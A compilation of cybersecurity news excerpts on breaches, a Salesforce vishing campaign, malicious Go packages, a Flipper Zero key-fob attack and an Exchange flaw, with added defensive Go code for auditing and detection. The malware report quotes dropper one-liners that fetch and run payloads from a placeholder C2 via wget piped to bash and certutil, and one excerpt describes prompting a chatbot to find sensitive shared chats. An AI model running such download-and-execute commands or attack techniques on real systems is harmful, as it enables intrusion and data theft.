arstechnica.com - Disclosure comes two months after Google warned the world of ongoing spree.
In June, Google said it unearthed a campaign that was mass-compromising accounts belonging to customers of Salesforce. The means: an attacker pretending to be someone in the customer's IT department feigning some sort of problem that required immediate access to the account. Two months later, Google has disclosed that it, too, was a victim.
The series of hacks is being carried out by financially motivated threat actors out to steal data in the hope of selling it back to the targets at sky-high prices. Rather than exploiting software or website vulnerabilities, they take a much simpler approach: calling the target and asking for access. The technique has proven remarkably successful. Companies whose Salesforce instances have been breached in the campaign, Bleeping Computer reported, include Adidas, Qantas, Allianz Life, Cisco, and the LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co.
Better late than never
The attackers abuse a Salesforce feature that allows customers to link their accounts to third-party apps that integrate data with in-house systems for blogging, mapping tools, and similar resources. The attackers in the campaign contact employees and instruct them to connect an external app to their Salesforce instance. As the employee complies, the attackers ask the employee for an eight-digit security code that the Salesforce interface requires before a connection is made. The attackers then use this number to gain access to the instance and all data stored in it.
Google said that its Salesforce instance was among those that were compromised. The breach occurred in June, but Google only disclosed it on Tuesday, presumably because the company only learned of it recently.
“Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off,” the company said.
Data retrieved by the attackers was limited to business information such as business names and contact details, which Google said was “largely public” already.
Google initially attributed the attacks to a group tracked as UNC6040. The company went on to say that a second group, UNC6042, has engaged in extortion activities, “sometimes several months after” the UNC6040 intrusions. This group brands itself under the name ShinyHunters.
“In addition, we believe threat actors using the 'ShinyHunters' brand may be preparing to escalate their extortion tactics by launching a data leak site (DLS),” Google said. “These new tactics are likely intended to increase pressure on victims, including those associated with the recent UNC6040 Salesforce-related data breaches.”
With so many companies falling to this scam—including Google, which only disclosed the breach two months after it happened—the chances are good that there are many more we don’t know about. All Salesforce customers should carefully audit their instances to see what external sources have access to them. They should also implement multifactor authentication and train staff how to detect scams before they succeed.
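One way to do that audit at scale, as an added example rather than anything from Google's or Salesforce's own material: pull the org's OauthToken records (the object that backs every connected-app authorisation) and flag apps that are not on your approved list, were first authorised recently, or show a burst of API calls right after being granted, which is the trace a bulk export through a freshly connected app leaves. The JSON below is constructed and the app names and user IDs are invented; the field names are those of the OauthToken object, the timestamp layout is the one assumed for Salesforce REST results, and the approved list, lookback window and call-rate threshold are assumptions to tune.

```go
package main

import (
	"encoding/json"
	"fmt"
	"time"
)

// sfLayout is the timestamp shape assumed for Salesforce REST query results.
const sfLayout = "2006-01-02T15:04:05.000-0700"

// Token is one OauthToken row, e.g. from
//   SELECT AppName, UserId, CreatedDate, LastUsedDate, UseCount FROM OauthToken
type Token struct {
	AppName      string `json:"AppName"`
	UserId       string `json:"UserId"`
	CreatedDate  string `json:"CreatedDate"`
	LastUsedDate string `json:"LastUsedDate"`
	UseCount     int    `json:"UseCount"`
}

// Alert is one connected app that needs a human look.
type Alert struct {
	AppName   string
	Users     int
	FirstSeen time.Time
	Reasons   []string
}

// AuditTokens groups tokens by connected app and flags every app not on the
// approved list, noting whether it was first authorised inside the lookback
// window and whether any token shows a burst of API calls right after it was
// granted. rateThreshold is calls per hour (an assumed tuning knob).
func AuditTokens(raw []byte, approved map[string]bool, now time.Time, lookback time.Duration, rateThreshold float64) ([]Alert, error) {
	var rows struct {
		Records []Token `json:"records"`
	}
	if err := json.Unmarshal(raw, &rows); err != nil {
		return nil, err
	}
	type agg struct {
		users     map[string]bool
		firstSeen time.Time
		burst     bool
	}
	apps := map[string]*agg{}
	for _, t := range rows.Records {
		created, err1 := time.Parse(sfLayout, t.CreatedDate)
		lastUsed, err2 := time.Parse(sfLayout, t.LastUsedDate)
		if err1 != nil || err2 != nil {
			return nil, fmt.Errorf("%s: unparseable timestamp", t.AppName)
		}
		a, ok := apps[t.AppName]
		if !ok {
			a = &agg{users: map[string]bool{}, firstSeen: created}
			apps[t.AppName] = a
		}
		a.users[t.UserId] = true
		if created.Before(a.firstSeen) {
			a.firstSeen = created
		}
		// Calls per hour between grant and last use, floored at one hour so a
		// few thousand calls in thirty minutes reads as a burst.
		hours := lastUsed.Sub(created).Hours()
		if hours < 1 {
			hours = 1
		}
		if float64(t.UseCount)/hours > rateThreshold {
			a.burst = true
		}
	}
	var alerts []Alert
	for name, a := range apps {
		if approved[name] {
			continue
		}
		al := Alert{name, len(a.users), a.firstSeen, []string{"connected app not on the approved list"}}
		if now.Sub(a.firstSeen) <= lookback {
			al.Reasons = append(al.Reasons, "first authorised within the lookback window")
		}
		if a.burst {
			al.Reasons = append(al.Reasons, "high API call rate immediately after authorisation")
		}
		alerts = append(alerts, al)
	}
	return alerts, nil
}

// Sample is a constructed query result with invented app names and user IDs.
const Sample = `{"records":[
{"AppName":"Salesforce for Outlook","UserId":"005A","CreatedDate":"2024-11-02T09:15:00.000+0000","LastUsedDate":"2025-08-05T08:00:00.000+0000","UseCount":412},
{"AppName":"Salesforce for Outlook","UserId":"005B","CreatedDate":"2025-01-20T10:00:00.000+0000","LastUsedDate":"2025-08-04T17:30:00.000+0000","UseCount":98},
{"AppName":"Acme Sync Helper","UserId":"005C","CreatedDate":"2025-06-10T14:03:00.000+0000","LastUsedDate":"2025-06-10T14:41:00.000+0000","UseCount":3200},
{"AppName":"Acme Sync Helper","UserId":"005D","CreatedDate":"2025-06-11T11:00:00.000+0000","LastUsedDate":"2025-06-11T11:05:00.000+0000","UseCount":15}
]}`

func main() {
	now := time.Date(2025, 6, 20, 0, 0, 0, 0, time.UTC) // fixed so the sample's dates fall in the window
	alerts, err := AuditTokens([]byte(Sample), map[string]bool{"Salesforce for Outlook": true}, now, 30*24*time.Hour, 100)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("%s: %d user(s), first seen %s: %v\n", a.AppName, a.Users, a.FirstSeen.Format("2006-01-02"), a.Reasons)
	}
}
```

An allowlist keyed on AppName is a triage aid, not a control: the name is chosen by whoever registers the connected app, so confirm each hit against the app's consumer key in Setup, revoke the tokens from the connected app's OAuth usage page, and lock the app down with IP and profile restrictions before anyone new can approve it.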
Socket’s Threat Research Team uncovered eleven malicious Go packages, ten of which are still live on the Go Module Mirror and eight of which are typosquats, all concealing an identical index-based string obfuscation routine. At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command-and-control (C2) endpoints, and executes it in memory. Most of the C2 endpoints share the path /storage/de373d0df/a31546bf, and six of the ten URLs are still reachable, giving the threat actor on-demand access to any developer or CI system that imports the packages.
The eleven packages are:
github.com/stripedconsu/linker
github.com/agitatedleopa/stm
github.com/expertsandba/opt
github.com/wetteepee/hcloud-ip-floater
github.com/weightycine/replika
github.com/ordinarymea/tnsr_ids
github.com/ordinarymea/TNSR_IDS
github.com/cavernouskina/mcp-go
github.com/lastnymph/gouid
github.com/sinfulsky/gouid
github.com/briefinitia/gouid
The packages all use an exec.Command("/bin/sh", "-c", <obfuscated>) construct. The array-driven decoder rebuilds a one-liner that either downloads a bash script with wget -O - <C2> | /bin/bash & on Unix systems, or runs certutil -urlcache -split -f <C2> %TEMP%\appwinx64.exe followed by a background start on Windows. Observed second-stage ELF and PE binaries enumerate host information, read browser data, and beacon outbound, often after the first stage triggers a one-hour sleep to evade sandboxes. Because the dropper delivers a bash-scripted payload on Linux and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise.
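The construct above is easy to hunt for mechanically. Below is an added example, not code from Socket's report or from the packages themselves: a go/ast scanner that flags any exec.Command call spawning a shell whose command line is not a plain string literal, which is exactly what an index-based decoder feeds it. The embedded source is a constructed stand-in with the same shape (byte table, index array, decoder feeding /bin/sh -c) that only reconstructs "echo ok"; the list of shell names is an assumption you may widen.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
)

// Finding is one exec.Command call that hands a runtime-built string to a shell.
type Finding struct {
	Line   int
	Shell  string
	Reason string
}

// shells lists interpreters whose -c / /C argument is itself a command line
// (assumption: extend for your fleet, e.g. zsh, powershell).
var shells = map[string]bool{"/bin/sh": true, "sh": true, "/bin/bash": true, "bash": true, "cmd": true, "cmd.exe": true}

// literalString unquotes a string-literal AST node; ok is false for anything else.
func literalString(e ast.Expr) (string, bool) {
	lit, ok := e.(*ast.BasicLit)
	if !ok || lit.Kind != token.STRING {
		return "", false
	}
	s, err := strconv.Unquote(lit.Value)
	return s, err == nil
}

// FindShellExecs parses one Go source file and reports exec.Command calls that
// spawn a shell with a command line assembled at runtime. Obfuscated droppers
// decode their one-liner into exactly such an argument, so a literal-only
// policy separates them from honest code with very little noise.
func FindShellExecs(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var out []Finding
	ast.Inspect(file, func(n ast.Node) bool {
		call, ok := n.(*ast.CallExpr)
		if !ok {
			return true
		}
		sel, ok := call.Fun.(*ast.SelectorExpr)
		if !ok || sel.Sel.Name != "Command" {
			return true
		}
		if pkg, ok := sel.X.(*ast.Ident); !ok || pkg.Name != "exec" || len(call.Args) == 0 {
			return true
		}
		line := fset.Position(call.Pos()).Line
		prog, ok := literalString(call.Args[0])
		if !ok {
			out = append(out, Finding{line, "?", "program name is not a literal"})
			return true
		}
		if !shells[prog] {
			return true
		}
		for _, arg := range call.Args[1:] {
			if _, ok := literalString(arg); !ok {
				out = append(out, Finding{line, prog, "shell command line built at runtime"})
				break
			}
		}
		return true
	})
	return out, nil
}

// Sample is a constructed module, not one of the packages named above; the
// decoder only yields "echo ok".
const Sample = `package demo

import "os/exec"

// constructed stand-in for the index-based decoder
var table = []byte("ceho k")
var idx = []int{1, 0, 2, 3, 4, 3, 5}

func decode() string {
	b := make([]byte, len(idx))
	for i, j := range idx {
		b[i] = table[j]
	}
	return string(b)
}

func run() {
	exec.Command("/bin/sh", "-c", decode()).Start() // flagged: argument built at runtime
	exec.Command("/bin/sh", "-c", "ls -l").Run()    // literal one-liner, not flagged
	exec.Command("ls", "-l").Run()                  // not a shell at all
}
`

func main() {
	findings, err := FindShellExecs("sample.go", Sample)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("sample.go:%d: %s via %s\n", f.Line, f.Reason, f.Shell)
	}
}
```

Run it over the output of go mod vendor (or the module cache) before the build step. Legitimate code that assembles shell one-liners will show up too, which is the point: each hit is a short, reviewable list, whereas a search for a specific C2 path is defeated the moment the next campaign rotates it.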
therecord.media - Germany’s highest court on Thursday ruled that law enforcement cannot use spyware to monitor personal devices in cases that carry a maximum sentence of less than three years.
The court was responding to a lawsuit brought by the German digital freedoms organization Digitalcourage.
The plaintiffs argued that a 2017 rules change enabling law enforcement to use spyware to eavesdrop on encrypted chats and messaging platforms could unfairly expose communications belonging to people who are not criminal suspects.
The 2017 change to the German criminal procedure code was not precise enough about when spyware can be used, the court ruled, saying that snooping software is only appropriate in investigations of serious cases.
Such surveillance causes a “very severe interference” with fundamental rights, the court said in a press release.
Law enforcement use of spyware “enables the interception and analysis of all raw data exchanged and thus has an exceptional reach, particularly given the realities of modern information technology and its significance for communication relations,” the press release said.
politico.com - The identities of confidential court informants are feared compromised in a series of breaches across multiple U.S. states.
The electronic case filing system used by the federal judiciary has been breached in a sweeping cyber intrusion that is believed to have exposed sensitive court data across multiple U.S. states, according to two people with knowledge of the incident.
The hack, which has not been previously reported, is feared to have compromised the identities of confidential informants involved in criminal cases at multiple federal district courts, said the two people, both of whom were granted anonymity because they were not authorized to speak publicly about the hack.
The Administrative Office of the U.S. Courts — which manages the federal court filing system — first determined how serious the issue was around July 4, said the first person. But the office, along with the Justice Department and individual district courts around the country, is still trying to determine the full extent of the incident.
It is not immediately clear who is behind the hack, though nation-state-affiliated actors are widely suspected, the people said. Criminal organizations may also have been involved, they added.
The Administrative Office of the U.S. Courts declined to comment. Asked whether it is investigating the incident, the FBI referred POLITICO to the Justice Department. The Justice Department did not immediately reply to a request for comment.
It is not immediately clear how the hackers got in, but the incident is known to affect the judiciary’s federal core case management system, which includes two overlapping components: Case Management/Electronic Case Files, or CM/ECF, which legal professionals use to upload and manage case documents; and PACER, a system that gives the public limited access to the same data.
In addition to records on witnesses and defendants cooperating with law enforcement, the filing system includes other sensitive information potentially of interest to foreign hackers or criminals, such as sealed indictments detailing non-public information about alleged crimes, and arrests and search warrants that criminal suspects could use to evade capture.
Chief judges of the federal courts in the 8th Circuit — which includes Arkansas, Iowa, Minnesota, Missouri, Nebraska, North Dakota, and South Dakota — were briefed on the hack at a judicial conference last week in Kansas City, said the two people. It is unclear who delivered the brief, though the Director of the Administrative Office of the U.S. Courts, Judge Robert J. Conrad, Jr., was in attendance, per the first person. Supreme Court Justice Brett Kavanaugh was also in attendance but didn’t address the breach in his remarks.
Staff for Conrad, a district judge in the Western District of North Carolina, declined to comment.
The hack is the latest sign that the federal court filing system is struggling to keep pace with a rising wave of cybersecurity threats.
www.digitaldigging.org - Digital Digging investigation: how your AI conversation could end your career
Corporate executives, government employees, and professionals are confessing to crimes, exposing trade secrets, and documenting career-ending admissions in ChatGPT conversations visible to anyone on the internet.
A Digital Digging investigation analyzed 512 publicly shared ChatGPT conversations using targeted keyword searches, uncovering a trove of self-incrimination and leaked confidential data. The shared chats include apparent insider trading schemes, detailed corporate financials, fraud admissions, and evidence of regulatory violations—all preserved as permanently searchable public records.
Among the discoveries is a conversation in which a CEO disclosed the following to ChatGPT:
Confidential Financial Data: About an upcoming settlement
Non-Public Revenue Projections: Specific forecasts showing revenue doubling
Merger intelligence: Detailed valuations
NDA-Protected Partnerships: Information about Asian customers
The person also described internal conflict and criticized executives by name.
Our method reveals an ironic truth: AI itself can expose these vulnerabilities. After discussing the dangers of making chats public, we asked Claude, another AI chatbot, to suggest Google search formulas that might uncover sensitive ChatGPT conversations.
cbc.ca - The insurance company did not cover any of the city’s claims totalling about $5 million. City staff say they've learned from their mistakes and are taking accountability for the cybersecurity breach.
Many City of Hamilton departments didn't have multi-factor authentication in place before cyber criminals launched a massive ransomware attack in February 2024, paralysing nearly all municipal services for weeks.
Multi-factor authentication, sometimes implemented as two-step verification, is a widely used extra layer of security for users logging into a system such as an email account: they must verify their identity using more than one method, for example by entering a code texted to their phone.
It's been used by corporations and technology companies for years. Google, for example, launched its two-step log-in system in 2011.
While not the only reason the attackers were successful, the city's lack of multi-factor authentication was a "root cause" of the breach, as determined by the city's insurance company, said a staff report to the general issues committee Wednesday.
As a result, the insurance company did not cover any of the city's claims totalling about $5 million.
"This has been a test of our system and a test of our leadership," said Mayor Andrea Horwath at a news conference Wednesday. "We are not sweeping this under the rug. We are owning it, we're fixing it and we're learning from it."
The lack of multi-factor authentication and the absence of insurance coverage were reported publicly for the first time this month.
The staff report said: "According to the policy, no coverage was available under the policy for any losses where the absence of MFA was the root cause of a cyber breach."
Solicitor Lisa Shields told councillors Wednesday that staff were aware of the multi-factor authentication requirement in their insurance policy in the fall of 2022 and began rolling out a pilot program the following year, but for only a few departments.
In early 2024, the city was preparing to fully implement multi-factor authentication, but then the ransomware attack took place on Feb. 25, said Cyrus Tehrani, acting chief information officer.
He told reporters that — contrary to what the insurance company found — the breach would've happened even with multi-factor authentication in place. The city also told CBC Hamilton in an email that it was a "highly sophisticated attack on an external, internet-facing server, gaining unauthorized access to the City of Hamilton systems."
Attackers demanded $18.5M in ransom
About 80 per cent of city systems were impacted and the attackers demanded the city pay $18.5 million to unlock it — a massive crisis and among the most significant in Canada, city manager Marnie Cluckie told councillors.
Based on advice from outside experts, the city decided not to pay the ransom and instead recover what it could and rebuild everything else. The police investigation is ongoing, Cluckie said.
To date, the city has spent $18.4 million and will continue to pay nearly $400,000 a month until November 2026 to rebuild its systems, said Mike Zegarac, general manager of finance.
The run of bad news continues. It is now Pandora's turn to warn its customers of a "personal data breach". The Danish jeweller's wording is surprising, to say the least, since it describes itself as the victim of "a cybersecurity attack" (sic).
Whatever the case, "some customer data was accessed via a third-party platform". Pandora speaks of "common data [...] copied by the attacker, namely your name, date of birth and email address". The company is reassuring: "no passwords, bank card numbers or other similarly confidential data were affected by this incident".
Pandora states that, according to its checks, "there is no indication that this data has been shared or published". The company recalls that protecting privacy is "an absolute priority" and that it takes this "situation very seriously".
That does not stop it from hiding behind its peers, noting that this kind of incident has "unfortunately become more common in recent years, particularly among international companies". It is true that leaks are multiplying, but that does not make it a good reason to fall victim to a cyberattack involving the theft of personal data.
The risk is always the same: "phishing attempts carried out by third parties impersonating Pandora" in order to harvest further information.
next.ink -
Bouygues Telecom is currently notifying no fewer than 6.4 million customers of unauthorised access to some of their personal data, and their banking data too. Watch out, then, for phishing attempts and for unexpected direct debits on your account.
After a late 2024 and early 2025 that went flat out on data leaks, things had calmed down a little, but not for long. The summer has been busy, with cyber incidents at Louis Vuitton, France Travail, Allianz Life, Pandora and now Bouygues Telecom.
The data includes personal information such as contact details, contractual data tied to your subscription, civil-status data or company data if you are a business customer, and, on the banking side, IBANs. However, "bank card numbers and the passwords to your Bouygues Telecom accounts are not affected".
In October, Free was also hit by a personal data leak that included IBANs. A few weeks earlier it was RED by SFR, again with banking data.
The risks of a leaked IBAN
The IBAN (International Bank Account Number) is the international identifier of your bank account, tied to a financial institution in a given country (it starts with FR for France, DE for Germany, and so on).
According to the Banque de France, "sharing your RIB is not risky in itself" (the RIB, relevé d'identité bancaire, is the French bank-details slip). But "as with any document containing personal information, you should properly identify the person you are giving a RIB to. A fraudster could use this information maliciously (e.g. identity theft)", the institution adds.
For its part, Bouygues Telecom states that "someone who holds an IBAN could not issue a transfer without your consent". Rightly, the operator takes care to add that direct debits are more complicated: "the account holder normally has to sign a SEPA mandate, but it cannot be ruled out that a fraudster manages to carry out such an operation by impersonating you".
Indeed, when the signature consists of an SMS or an email, identity theft is easy to set up.
Bouygues Telecom therefore advises its customers to check their direct debits and call their bank if in doubt: "Be aware that banking regulations allow you to dispute, for 13 months, any direct debit made from your bank account without your consent".
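Because an IBAN carries its own check digits (ISO 7064 mod 97-10), a leaked export or a DLP stream can be scanned for real account numbers with few false positives, which is what you need to size a breach like this one or to stop IBANs leaving through an export in the first place. The following is an added example, not part of the article or of any bank's or operator's code: a validator and a free-text scanner in Go, with a partial country-length table (assumption: extend it from the SWIFT IBAN registry) and a constructed sample export built from publicly documented example IBANs, not real customer data.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ibanLength holds registered IBAN lengths for a handful of countries.
// Assumption: partial table, extend from the SWIFT IBAN registry for production.
var ibanLength = map[string]int{"FR": 27, "DE": 22, "GB": 22, "NL": 18, "ES": 24, "IT": 27, "BE": 16}

// mod97 computes the ISO 7064 mod 97-10 remainder of an alphanumeric string,
// mapping letters A..Z to 10..35 and reducing digit by digit so nothing overflows.
func mod97(s string) int {
	r := 0
	for _, c := range s {
		switch {
		case c >= '0' && c <= '9':
			r = (r*10 + int(c-'0')) % 97
		case c >= 'A' && c <= 'Z':
			r = (r*100 + int(c-'A') + 10) % 97
		default:
			return -1
		}
	}
	return r
}

// ValidateIBAN normalises case and spacing, checks the country's registered
// length when known, and verifies the check digits: moving the first four
// characters to the end must leave a remainder of exactly 1.
func ValidateIBAN(raw string) (string, bool) {
	s := strings.ToUpper(strings.Join(strings.Fields(raw), ""))
	if len(s) < 15 || len(s) > 34 {
		return s, false
	}
	if want, ok := ibanLength[s[:2]]; ok && len(s) != want {
		return s, false
	}
	return s, mod97(s[4:]+s[:4]) == 1
}

// ibanCandidate is deliberately loose: two letters, two digits, then 11 to 30
// alphanumerics with optional single spaces between them.
var ibanCandidate = regexp.MustCompile(`\b[A-Z]{2}[0-9]{2}(?:[ ]?[A-Z0-9]){11,30}\b`)

// FindValidIBANs scans free text for IBAN-looking tokens, trims each candidate
// to its country's registered length (so a trailing currency code or word does
// not spoil the match) and keeps only those whose check digits verify.
func FindValidIBANs(text string) []string {
	var out []string
	for _, m := range ibanCandidate.FindAllString(text, -1) {
		s := strings.Join(strings.Fields(m), "")
		if want, ok := ibanLength[s[:2]]; ok && len(s) > want {
			s = s[:want]
		}
		if norm, ok := ValidateIBAN(s); ok {
			out = append(out, norm)
		}
	}
	return out
}

// Sample is a constructed "leaked export" for exercising the scanner. The IBANs
// are the public example numbers for FR and DE; the third has one altered digit.
const Sample = `constructed sample export, not real customer data
client 1; FR14 2004 1010 0505 0001 3M02 606; monthly debit
client 2; DE89370400440532013000 EUR
client 3; DE89 3704 0044 0532 0130 01; typo in last digit
ref ABC123 ORDER 2024`

func main() {
	for _, raw := range []string{"GB82 WEST 1234 5698 7654 32", "DE89 3704 0044 0532 0130 01"} {
		norm, ok := ValidateIBAN(raw)
		fmt.Printf("%-30s -> %s valid=%v\n", raw, norm, ok)
	}
	fmt.Println("valid IBANs found in sample:", FindValidIBANs(Sample))
}
```

The check digits are what make this usable as a detection rule: a bare regex for "two letters, two digits, a run of alphanumerics" fires on order references and product codes, whereas requiring the mod-97 remainder to be 1 rejects all but roughly one in a hundred of those by chance, and rejects any real IBAN that was mangled in transcription.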
Cyberattacks are "very frequent and spare" no one
The operator gives no details about the cyberattack. It simply says it has blocked the access, stepped up monitoring "and implemented the necessary additional measures". The company also notes that cyberattacks are "very frequent and spare no company", an argument recently used by Pandora in a communication that was surprising, to say the least.
As required by law, the CNIL has been informed. A complaint has also been filed with the judicial authorities.
The risk in such a situation, quite apart from debits on your account, is being targeted by phishing. Attackers can use the harvested data to pose as Bouygues Telecom or your bank in order to obtain further data.
Hackers are using a custom Flipper Zero firmware to bypass security protections in automotive key fobs, putting millions of vehicles at risk.
Hackers have a new way to break into – or even steal – your car, and all it takes is the push of a button. Malicious actors are circumventing modern security protections in automotive key fobs, researchers warn, putting millions of vehicles at risk.
The hack works by intercepting and cloning a key fob’s radio signal, using custom firmware built for the Flipper Zero, a handheld device designed for analyzing and testing wireless communication protocols.
It bypasses a security mechanism known as rolling codes, designed to prevent thieves from replaying captured key fob signals to unlock a car. Each time the key fob is pressed, an internal algorithm generates a new, one-time-use code, and the vehicle unlocks only if the code is valid and has not already been accepted.
But the new hack sidesteps these protections by exploiting the rolling code algorithm to calculate valid key fob commands based on a single intercepted signal.
“I can sit in a parking lot and wait for someone to lock their car, and immediately I get all their fob buttons,” Jeremy Yablan, a hacker known online as RocketGod, told Straight Arrow News. “Other attacks are tricks. This one just captures a single keypress and decodes all buttons and rolling codes in an instant. You open your trunk – the bad guy has your entire fob.”
Yablan described the attack as “ridiculously fast and easy.”
Many vehicles vulnerable
SAN obtained a copy of the firmware and tested the attack in a controlled setting with the permission of vehicle owners. In one case, capturing a single unlock signal allowed the Flipper Zero to repeatedly lock, unlock and open the trunk of the target car.
The hack also disabled the original key fob until it was manually reset.
Vehicles vulnerable to the attack include numerous models manufactured by Chrysler, Dodge, Fiat, Ford, Hyundai, Jeep, Kia, Mitsubishi and Subaru, according to an infographic provided with the firmware. The infographic says updates to attack other car makers, such as Honda, are “in development.” It also mentions high-end car companies such as Alfa Romeo, Ferrari and Maserati.
Numerous car companies listed as susceptible to attack did not respond to SAN’s requests for comment. James Bell, the head of corporate communications at Kia America, said his company “is not aware of this situation and therefore have no comment to offer.”
The team behind the Flipper Zero device, which does not endorse the custom firmware, did not respond to requests for comment.
Created by Russian hacker
The hack appears to be based on a 2022 attack known as “RollBack,” developed by researchers at CrySys Lab in Hungary. The researchers demonstrated how rolling code protections could be broken by capturing valid signals and replaying them in a specific order to bypass a vehicle’s code synchronization system.
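To make the RollBack idea concrete, here is an added toy model, not code from CrySys Lab, from the firmware's author or from any vehicle: a fob that tags an incrementing counter with an HMAC, and a receiver with an acceptance window. The receiver's resynchronisation rule is the assumption under test. The weak variant resynchronises on any two consecutive genuine codes, even ones that move the counter backwards, which is what lets a captured pair be replayed later; the strict variant only resynchronises forward. Nothing here reflects a real key-fob protocol, and the firmware described above reportedly goes further by deriving codes from a single capture, which this toy does not model.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// Frame is one fob transmission in this toy scheme: a counter, a button code
// and an HMAC tag over both under the key shared by fob and car.
type Frame struct {
	Counter uint32
	Button  byte
	Tag     []byte
}

func makeTag(key []byte, counter uint32, button byte) []byte {
	mac := hmac.New(sha256.New, key)
	var buf [5]byte
	binary.BigEndian.PutUint32(buf[:4], counter)
	buf[4] = button
	mac.Write(buf[:])
	return mac.Sum(nil)[:8]
}

// Fob bumps its counter on every press, so no two frames are ever identical.
type Fob struct {
	key     []byte
	counter uint32
}

func (f *Fob) Press(button byte) Frame {
	f.counter++
	return Frame{f.counter, button, makeTag(f.key, f.counter, button)}
}

// Receiver accepts a genuine frame only if its counter is ahead of the last
// accepted one by at most openWindow. Outside that window nothing is acted on,
// but two consecutive genuine counters trigger a resynchronisation.
// strict=false is the weak rule assumed to underlie RollBack: any consecutive
// pair resyncs, even one that moves the counter backwards. strict=true only
// resyncs forward, within resyncWindow. Both rules are assumptions of this toy.
type Receiver struct {
	key                      []byte
	last                     uint32
	openWindow, resyncWindow uint32
	strict                   bool
	pending                  *Frame
}

func (r *Receiver) Accept(fr Frame) bool {
	if !hmac.Equal(makeTag(r.key, fr.Counter, fr.Button), fr.Tag) {
		return false
	}
	ahead := fr.Counter - r.last // unsigned wrap-around makes stale counters huge
	if ahead >= 1 && ahead <= r.openWindow {
		r.last, r.pending = fr.Counter, nil
		return true
	}
	if r.strict && ahead > r.resyncWindow {
		r.pending = nil // a backwards or absurdly far counter never primes resync
		return false
	}
	if r.pending != nil && fr.Counter == r.pending.Counter+1 {
		r.last, r.pending = fr.Counter, nil
		return true // resynchronised onto the pair
	}
	cp := fr
	r.pending = &cp
	return false
}

// Simulate records three presses, lets the owner keep using the fob, then
// replays the capture. It reports whether a lone stale frame, a consecutive
// pair, and a further captured frame after the pair were accepted.
func Simulate(strict bool) (lone, pair, after bool) {
	key := []byte("toy key, not a real fob secret")
	fob := &Fob{key: key}
	car := &Receiver{key: key, openWindow: 16, resyncWindow: 1 << 15, strict: strict}
	captured := []Frame{fob.Press('L'), fob.Press('U'), fob.Press('T')}
	for _, fr := range captured {
		car.Accept(fr) // the owner's own presses; the attacker only listens
	}
	for i := 0; i < 10; i++ {
		car.Accept(fob.Press('L')) // life goes on, the counter moves ahead
	}
	lone = car.Accept(captured[2])  // plain replay of one old frame
	car.Accept(captured[0])         // first half of the captured pair
	pair = car.Accept(captured[1])  // second half: does the car roll back?
	after = car.Accept(captured[2]) // and is the rest of the capture live again?
	return lone, pair, after
}

func main() {
	for _, strict := range []bool{false, true} {
		lone, pair, after := Simulate(strict)
		fmt.Printf("strict=%-5v lone replay=%v pair resync=%v later frame=%v\n", strict, lone, pair, after)
	}
}
```

The lone replay fails under both rules, which is the guarantee rolling codes are sold on. The difference is the resync path: a receiver that accepts any consecutive pair as proof of a desynchronised fob hands the attacker a way to wind its counter back to the capture, after which every frame recorded since is fresh again; one that only resynchronises forward treats the same pair as noise.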
The firmware for the Flipper Zero apparently was created by a Russian hacker. Advertisements for the firmware, which includes a serial lock designed to keep it from being distributed to additional users, show it being listed online for as much as $1,000.
The firmware obtained by SAN was a version that had its serial lock disabled by security researchers. The firmware’s creator told SAN that a newer version has since been developed. He shared an updated infographic that lists Suzuki as another vulnerable make.
SAN is not naming the hacker to avoid facilitating the sale of his firmware to potential thieves.
The freelance security researcher and YouTuber known as Talking Sasquach, who regularly covers the Flipper Zero, said the firmware’s creator is marketing the tool specifically to criminals.
‘Only a matter of time’
Protections against the attack are limited.
“There’s really not much people can do to protect themselves against this attack short of just not using your key fob and only using the keys,” Talking Sasquach said.
Given that many modern vehicles do not use traditional keys and rely entirely on key fobs, such workarounds are not viable for all drivers.
“Car companies could issue an update,” Talking Sasquach said, “but they’d have to pull in all of the vehicles and change their software and the key fob’s software, which would probably not be feasible, and a huge cost to manufacturers.”
Despite attempts by the firmware’s creator to limit its distribution, Yablan and other hackers have already managed to remove the built-in licensing restrictions.
The hack is likely to become more commonly used, security researcher Ryan Montgomery, founder of Pentester.com, told SAN.
“It’s only a matter of time,” he said, “before it gets leaked to the masses.”
bleepingcomputer.com - Microsoft has warned customers to mitigate a high-severity vulnerability in Exchange Server hybrid deployments that could allow attackers to escalate privileges in Exchange Online cloud environments undetected.
Exchange hybrid configurations connect on-premises Exchange servers to Exchange Online (part of Microsoft 365), allowing for seamless integration of email and calendar features between on-premises and cloud mailboxes, including shared calendars, global address lists, and mail flow.
However, in hybrid Exchange deployments, on-premises Exchange Server and Exchange Online also share the same service principal, a shared identity used for authentication between the two.
By abusing this shared identity, attackers who control the on-premises Exchange server can potentially forge or manipulate trusted tokens or API calls that the cloud side accepts as legitimate, since it implicitly trusts the on-premises server.
Additionally, actions originating from on-premises Exchange don't always generate logs associated with malicious behavior in Microsoft 365; therefore, traditional cloud-based auditing (such as Microsoft Purview or M365 audit logs) may not capture security breaches if they originated on-premises.
"In an Exchange hybrid deployment, an attacker who first gains administrative access to an on-premises Exchange server could potentially escalate privileges within the organization's connected cloud environment without leaving easily detectable and auditable trace," Microsoft said on Wednesday in a security advisory describing a high-severity privilege escalation vulnerability now tracked as CVE-2025-53786.
The vulnerability affects Exchange Server 2016 and Exchange Server 2019, as well as Microsoft Exchange Server Subscription Edition, the latest version, which replaces the traditional perpetual license model with a subscription-based one.
While Microsoft has yet to observe in-the-wild exploitation, the company has tagged it as "Exploitation More Likely" because its analysis revealed that exploit code could be developed to consistently exploit this vulnerability, increasing its attractiveness to attackers.
theregister.com - European airline giants Air France and KLM say they are the latest in a string of major organizations to have their customers' data stolen by way of a break-in at a third-party organization.
The airlines, which share a parent company, Air France-KLM Group, said in a joint statement that they "detected unusual activity on an external platform we use for customer service," which led to attackers accessing customer data.
"Our IT security teams, along with the relevant external party, took immediate action to stop the unauthorized access," the statement read. "Measures have also been implemented to prevent recurrence. Internal Air France and KLM systems were not affected.
